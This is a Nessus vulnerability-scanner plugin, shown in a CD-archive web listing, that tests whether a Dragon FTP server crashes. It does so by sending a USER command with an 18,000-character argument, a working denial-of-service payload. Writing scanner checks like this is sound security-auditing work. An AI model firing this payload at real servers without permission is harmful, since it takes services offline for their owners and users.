home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / dragon_ftp.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  93 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10450);
  10.  script_bugtraq_id(1352);
  11.  script_version ("$Revision: 1.12 $");
  12.  script_cve_id("CAN-2000-0479");
  13.  name["english"] = "Dragon FTP overflow";
  14.  name["francais"] = "Dragon FTP overflow";
  15.  
  16.  
  17.  script_name(english:name["english"], francais:name["francais"]);
  18.  
  19.  desc["english"] = "It was possible to
  20. shut down the remote FTP server by issuing
  21. a USER command followed by a far too long
  22. argument (over 16,000 chars)
  23.  
  24. This problem allows an attacker to prevent
  25. your site from sharing some resources
  26. with the rest of the world.
  27.  
  28. Solution : upgrade to the latest version your FTP server.
  29.  
  30. Risk factor : High";
  31.  
  32.  
  33.  desc["francais"] = "Il s'est avΘrΘ possible
  34. de couper le serveur FTP distant en 
  35. faisant la commande 'USER' suivie d'un argument
  36. trop long (de plus de 16.000 octets).
  37.  
  38. Ce problΦme permet α des pirates en herbe
  39. d'empecher votre site de partager certaines
  40. ressources avec le reste du monde.
  41.  
  42. Solution : mettez α jour votre server FTP.
  43.  
  44. Facteur de risque : ElevΘ";
  45.  
  46.  
  47.  script_description(english:desc["english"], francais:desc["francais"]);
  48.  
  49.  summary["english"] = "Attempts a USER buffer overflows";
  50.  summary["francais"] = "Essaye un USER buffers overflows";
  51.  script_summary(english:summary["english"], francais:summary["francais"]);
  52.  
  53.  script_category(ACT_DENIAL);
  54.  
  55.  
  56.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  57.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  58.  family["english"] = "Denial of Service";
  59.  family["francais"] = "DΘni de service";
  60.  script_family(english:family["english"], francais:family["francais"]);
  61.  script_dependencie("find_service.nes", "ftp_anonymous.nasl");
  62.  script_require_ports("Services/ftp", 21);
  63.  exit(0);
  64. }
  65.  
  66. include("ftp_func.inc");
  67. port = get_kb_item("Services/ftp");
  68. if(!port)port = 21;
  69.  
  70. if(!get_port_state(port))exit(0);
  71.  
  72. soc = open_sock_tcp(port);
  73. if(soc)
  74. {
  75.   r = ftp_recv_line(socket:soc);
  76.   if(r)
  77.   {
  78.   req = string("USER ", crap(18000), "\r\n");
  79.   send(socket:soc, data:req);
  80.   r = ftp_recv_line(socket:soc);
  81.   close(soc);
  82.   sleep(1);
  83.  
  84.   soc2 = open_sock_tcp(port);
  85.   if(!soc2)security_hole(port);
  86.   else {
  87.       r2 = ftp_recv_line(socket:soc2);
  88.       close(soc2);
  89.     if(!r2)security_hole(port);
  90.       }
  91.   }  
  92. }
  93.